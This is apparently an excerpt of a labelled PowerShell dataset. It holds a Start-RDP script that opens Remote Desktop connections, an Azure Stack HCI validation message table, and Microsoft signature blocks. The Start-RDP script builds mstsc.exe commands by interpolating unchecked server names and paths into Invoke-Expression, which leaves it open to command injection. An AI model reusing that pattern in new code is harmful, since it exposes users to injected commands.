# TzcgqOGluRF+2Y3fsk2JFmUAt18H0hq2Nta/CrMPsLmq6w9bnYaZXMPIrGIa0YyG
# uZ04KRj6
# SIG # End signature block
|
combined_dataset/train/non-malicious/Start-RDP_1.ps1
|
Start-RDP_1.ps1
|
########################################################################################################################
# NAME
# Start-RDP
#
# SYNOPSIS
# Opens a remote desktop connection to another computer.
#
# SYNTAX
# Start-RDP [[-Server] <string>] [[-Width] <int>] [[-Height] <int>]
# Start-RDP -Path <string> [[-Width] <int>] [[-Height] <int>]
#
# DETAILED DESCRIPTION
# The Start-RDP cmdlet opens a new Remote Desktop connection using the Microsoft Terminal Services Client.
# Connection settings can be specified by argument or read from a standard RDP file.
#
# PARAMETERS
# -Server <string>
# Specifies the name of the server to connect to. May also include an IP address, domain, and/or port.
#
# Required? false
# Position? 1
# Default value
# Accept pipeline input? true
# Accept wildcard characters? false
#
# -Width <int>
# Specifies the desired width of the resolution for the connection (for non-full screen connections).
#
# Required? false
# Position? 2
# Default value
# Accept pipeline input? false
# Accept wildcard characters? false
#
# -Height <int>
# Specifies the desired height of the resolution for the connection (for non-full screen connections).
#
# Required? false
# Position? 3
# Default value
# Accept pipeline input? false
# Accept wildcard characters? false
#
# -Path <string>
# Specifies the path to an RDP file to connect with (resolution settings can be overridden using the
# -Width and -Height parameters.
#
# Required? false
# Position? 4
# Default value
# Accept pipeline input? true
# Accept wildcard characters? false
#
# -Console <SwitchParameter>
# Connect to a Windows Server 2003 console session.
#
# Required? false
# Position? named
# Default value false
# Accept pipeline input? false
# Accept wildcard characters? false
#
# -Admin <SwitchParameter>
# Connect to a Windows Server 2008 administrator session.
#
# Required? false
# Position? named
# Default value false
# Accept pipeline input? false
# Accept wildcard characters? false
#
# -Fullscreen <SwitchParameter>
# Open connection in full screen mode.
#
# Required? false
# Position? named
# Default value false
# Accept pipeline input? false
# Accept wildcard characters? false
#
# -Public <SwitchParameter>
# Run Remote Desktop in public mode.
#
# Required? false
# Position? named
# Default value false
# Accept pipeline input? false
# Accept wildcard characters? false
#
# -Span <SwitchParameter>
# Span the Remote Desktop connection across multiple monitors. Each monitor must have the same height
# and be arranged vertically.
#
# Required? false
# Position? named
# Default value false
# Accept pipeline input? false
# Accept wildcard characters? false
#
# INPUT TYPE
# String,System.IO.FileInfo
#
# RETURN TYPE
#
#
# NOTES
#
# -------------------------- EXAMPLE 1 --------------------------
#
# C:\\PS>Start-RDP
#
#
# This command opens the Terminal Services Client connection dialog to specify a connection.
#
#
# -------------------------- EXAMPLE 2 --------------------------
#
# C:\\PS>Start-RDP -Server myserver -Width 1024 -Height 768
#
#
# This command opens a new Remote Desktop connection to the server named "myserver" in a window with 1024x768 resolution.
#
#
# -------------------------- EXAMPLE 3 --------------------------
#
# C:\\PS>Start-RDP -Server myserver -Fullscreen
#
#
# This command opens a new full screen Remote Desktop connection to the server named "myserver".
#
#
# -------------------------- EXAMPLE 4 --------------------------
#
# C:\\PS>Start-RDP -Path C:\\myserver.rdp
#
#
# This command opens a new Remote Desktop connection using the specified RDP file.
#
#
#Function global:Start-RDP {
param(
[string]$Server = "",
[int]$Width = "",
[int]$Height = "",
[string]$Path = "",
[switch]$Console,
[switch]$Admin,
[switch]$Fullscreen,
[switch]$Public,
[switch]$Span
)
begin {
$arguments = ""
$dimensions = ""
$processed = $false
if ($admin) {
$arguments += "/admin "
} elseif ($console) {
$arguments += "/console "
}
if ($fullscreen) {
$arguments += "/f "
}
if ($public) {
$arguments += "/public "
}
if ($span) {
$arguments += "/span "
}
if ($width -and $height) {
$dimensions = "/w:$width /h:$height"
}
}
process {
Function script:executePath([string]$path) {
Invoke-Expression "mstsc.exe '$path' $dimensions $arguments"
}
Function script:executeArguments([string]$Server) {
Invoke-Expression "mstsc.exe /v:$server $dimensions $arguments"
}
if ($_) {
if ($_ -is [string]) {
if ($_ -imatch '\\.rdp$') {
if (Test-Path $_) {
executePath $_
$processed = $true
} else {
throw "Path does not exist."
}
} else {
executeArguments $_
$processed = $true
}
} elseif ($_ -is [System.IO.FileInfo]) {
if (Test-Path $_.FullName) {
executePath $_.FullName
$processed = $true
} else {
throw "Path does not exist."
}
} elseif ($_.Path) {
if (Test-Path $_.Path) {
executePath $_.Path
$processed = $true
} else {
throw "Path does not exist."
}
} elseif ($_.DnsName) {
executeArguments $_.DnsName
$processed = $true
} elseif ($_.Server) {
executeArguments $_.Server
$processed = $true
} elseif ($_.ServerName) {
executeArguments $_.ServerName
$processed = $true
} elseif ($_.Name) {
executeArguments $_.Name
$processed = $true
}
}
}
end {
if ($path) {
if (Test-Path $path) {
Invoke-Expression "mstsc.exe '$path' $dimensions $arguments"
} else {
throw "Path does not exist."
}
} elseif ($server) {
Invoke-Expression "mstsc.exe /v:$server $dimensions $arguments"
} elseif (-not $processed) {
Invoke-Expression "mstsc.exe $dimensions $arguments"
}
}
#}
|
combined_dataset/train/non-malicious/sample_51_96.ps1
|
sample_51_96.ps1
|
ConvertFrom-StringData @'
###PSLOC
ArcMachineAlreadyExistsInResourceGroupError = Arc machine(s) with names: {0} already exists in the Resource Group {1}. Use a different Resource group for registration or specify a different Arc for Servers Resource Group.
ArcMachineNotFound = No Arc machine(s) were found with the same as as cluster node names in ARC resource group {0}
ArcAlreadyEnabledInADifferentResourceError = Following cluster node(s) are already Arc enabled with a different ARM Resource Id: {0}. Disconnect Arc agent on these nodes and run Register-AzStackHCI again.
ArcNotEnabledInADifferentResource = No cluster nodes are Arc enabled in a different subscription id or resource group.
ClusterAlreadyRegistered = HCI Cluster is already registered, this validation will be skipped
ArcValidationNotSupported = ARC Integration validation is only supported on HCI OS
AzureContextRequired = Azure Context is required to use this validation. Please login to Azure and try again.
RegionRequired = Azure Region is required to run Azure region validation. Skipping this validation.
SessionNotProvided = Powershell Sessions to the nodes are required to check their arc registration state. Skipping this validation.
RegionVerified = Azure Region successfully verified.
RegionNotVerified = Invalid Region: {0}. Try again with the correct Azure Region.
ResourceGroupLimitReached = Resource group limit reached in subscription id: {0}. Delete {1} resource group(s) in the subscription to continue.
ResourceGroupLimitCheckSucceeded = Resource group limit successfully verified in subscription id: {0}.
ResourceLimitReached = Azure Stack HCI cluster resource limit reached in resource group: {0} in subscription id: {1}. Try a different HCI resource group, or delete 1 Azure Stack HCI cluster resource in resource group {0}.
ResourceLimitCheckSucceeded = Azure Stack HCI cluster resource limit successfully verified in resource group: {0}.
MissingPermissions = User doesn't have the required permissions to perform the validation: {0}. Skipping the validation.
RoleAssignmentLimitReached = Role Assignment limit reached in subscription id: {0}.
RoleAssignmentLimitSuccessfullyVerified = Role Assignment limit successfully verified in subscription id: {0}.
VerifyingIfHCIResourceExistsInHCIRG = Verifying if Azure Stack HCI Resource with the name: {0} exists in Subscription ID : {1}, Resource Group: {2}.
ResourceNameEmpty = Azure Stack HCI Resource Name is empty. Skipping the validation.
HCIClusterNotFound = No Azure Stack HCI Cluster resource with the name: {0} in Resource Group: {1}. Validation succeeded.
HCIClusterResourceAlreadyExistsError = Azure Stack HCI Cluster resource with the name: {0} already exists in the Resource Group: {1}.
ArcAgentExePath = C:\\Program Files\\AzureConnectedMachineAgent\\azcmagent.exe
'@
# SIG # Begin signature block
# MIInwgYJKoZIhvcNAQcCoIInszCCJ68CAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDOYDbI7hXWl+0b
# TCl0XpXHi38J55FYGZZ5294q8VFaqqCCDXYwggX0MIID3KADAgECAhMzAAADrzBA
# DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA
# hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG
# 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN
# xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL
# go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB
# tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd
# mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ
# 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY
# 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp
# XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn
# TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT
# e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG
# OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O
# PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk
# ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx
# HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt
# CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGaIwghmeAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIDNaIKbT4JtOroXstlFHAXnc
# jzO4caSM2Mx4w+2xwuUSMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEAVVSA+hJfDMVhLYvjRUNaL1SqtJ2AjuWAU13IQmmUrAClx2kWse/UN3lL
# K+3bBfLuxWy99hGPhKTPQrSuwR5d47TNoLpWavD20JCwcSqCwrDxQBiWUZzKMRLT
# Rv7vbdF/2O/Bh4koZCi+Y6BA9l7L4/4dvzFaV2/eiTLyULNRLZXKPTqdrdf52GJS
# GKivMRSSxCqTs16MrZh6uoROd72IhQTsSXtfaf6R2Vi3vpsnySjopVE0Pk7ckN7F
# Eqy2f5I/0Ybt4oVblinaSN8Dt6gB9D8ymm3WxiIiVFmq1UK5UmIIcs/zDPHSB1PX
# oFZnFVBUoVqM8pdthIlP7JV1UsUFuaGCFywwghcoBgorBgEEAYI3AwMBMYIXGDCC
# FxQGCSqGSIb3DQEHAqCCFwUwghcBAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq
# hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCBzAOV9y0egvMy+IncAv8TDmqzRx9Oeuuz+lG8vcnoS7wIGZbqeuk8C
# GBMyMDI0MDIxMjE0MDUzMi4xMzFaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl
# bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO
# OjA4NDItNEJFNi1DMjlBMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT
# ZXJ2aWNloIIRezCCBycwggUPoAMCAQICEzMAAAHajtXJWgDREbEAAQAAAdowDQYJ
# KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx
# MDEyMTkwNjU5WhcNMjUwMTEwMTkwNjU5WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl
# cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjowODQyLTRC
# RTYtQzI5QTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC
# AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJOQBgh2tVFR1j8jQA4NDf8b
# cVrXSN080CNKPSQo7S57sCnPU0FKF47w2L6qHtwm4EnClF2cruXFp/l7PpMQg25E
# 7X8xDmvxr8BBE6iASAPCfrTebuvAsZWcJYhy7prgCuBf7OidXpgsW1y8p6Vs7sD2
# aup/0uveYxeXlKtsPjMCplHkk0ba+HgLho0J68Kdji3DM2K59wHy9xrtsYK+X9er
# bDGZ2mmX3765aS5Q7/ugDxMVgzyj80yJn6ULnknD9i4kUQxVhqV1dc/DF6UBeuzf
# ukkMed7trzUEZMRyla7qhvwUeQlgzCQhpZjz+zsQgpXlPczvGd0iqr7lACwfVGog
# 5plIzdExvt1TA8Jmef819aTKwH1IVEIwYLA6uvS8kRdA6RxvMcb//ulNjIuGceyy
# kMAXEynVrLG9VvK4rfrCsGL3j30Lmidug+owrcCjQagYmrGk1hBykXilo9YB8Qyy
# 5Q1KhGuH65V3zFy8a0kwbKBRs8VR4HtoPYw9z1DdcJfZBO2dhzX3yAMipCGm6Smv
# mvavRsXhy805jiApDyN+s0/b7os2z8iRWGJk6M9uuT2493gFV/9JLGg5YJJCJXI+
# yxkO/OXnZJsuGt0+zWLdHS4XIXBG17oPu5KsFfRTHREloR2dI6GwaaxIyDySHYOt
# vIydla7u4lfnfCjY/qKTAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQUoXyNyVE9ZhOV
# izEUVwhNgL8PX0UwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD
# VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j
# cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG
# CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw
# MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD
# CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBALmDVdTtuI0jAEt4
# 1O2OM8CU237TGMyhrGr7FzKCEFaXxtoqk/IObQriq1caHVh2vyuQ24nz3TdOBv7r
# cs/qnPjOxnXFLyZPeaWLsNuARVmUViyVYXjXYB5DwzaWZgScY8GKL7yGjyWrh78W
# JUgh7rE1+5VD5h0/6rs9dBRqAzI9fhZz7spsjt8vnx50WExbBSSH7rfabHendpeq
# bTmW/RfcaT+GFIsT+g2ej7wRKIq/QhnsoF8mpFNPHV1q/WK/rF/ChovkhJMDvlqt
# ETWi97GolOSKamZC9bYgcPKfz28ed25WJy10VtQ9P5+C/2dOfDaz1RmeOb27Kbeg
# ha0SfPcriTfORVvqPDSa3n9N7dhTY7+49I8evoad9hdZ8CfIOPftwt3xTX2RhMZJ
# CVoFlabHcvfb84raFM6cz5EYk+x1aVEiXtgK6R0xn1wjMXHf0AWlSjqRkzvSnRKz
# FsZwEl74VahlKVhI+Ci9RT9+6Gc0xWzJ7zQIUFE3Jiix5+7KL8ArHfBY9UFLz4sn
# boJ7Qip3IADbkU4ZL0iQ8j8Ixra7aSYfToUefmct3dM69ff4Eeh2Kh9NsKiiph58
# 9Ap/xS1jESlrfjL/g/ZboaS5d9a2fA598mubDvLD5x5PP37700vm/Y+PIhmp2fTv
# uS2sndeZBmyTqcUNHRNmCk+njV3nMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ
# mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT
# Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m
# dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh
# dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1
# WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD
# Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB
# BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK
# NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg
# fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp
# rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d
# vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9
# 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR
# Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu
# qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO
# ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb
# oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6
# bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t
# AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW
# BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb
# UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz
# aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku
# aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA
# QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2
# VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu
# bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw
# LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93
# d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt
# MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q
# XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6
# U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt
# I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis
# 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp
# kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0
# sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e
# W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ
# sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7
# Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0
# dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ
# tB1VM1izoXBm8qGCAtcwggJAAgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh
# bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjow
